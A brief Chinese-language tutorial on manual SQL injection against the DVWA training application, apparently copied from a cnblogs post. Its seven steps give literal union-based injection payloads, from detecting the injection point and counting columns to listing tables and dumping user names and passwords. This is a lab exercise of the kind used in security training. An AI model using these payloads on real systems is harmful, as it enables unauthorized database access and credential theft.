sql注入:攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。
一、判断是否存在注入点:
1.1;正常
2.1‘;加上一个单引号报错
3.1’ and '1'='1;正常
说明存在注入点
二、判断字段数
1.1' order by 2#
2.1' order by 3#;到3就报错了,说明只有两个字段
三、确定回显位置
1' union select 1,2#
四、查询当前数据库和版本
1' union select version(),database()#
五、获取数据库中的表
1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
六、获取users表中的字段名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
七、获取表中的一些数据
1' union select user,password from users#
来源:https://www.cnblogs.com/walkwaters/p/12147679.html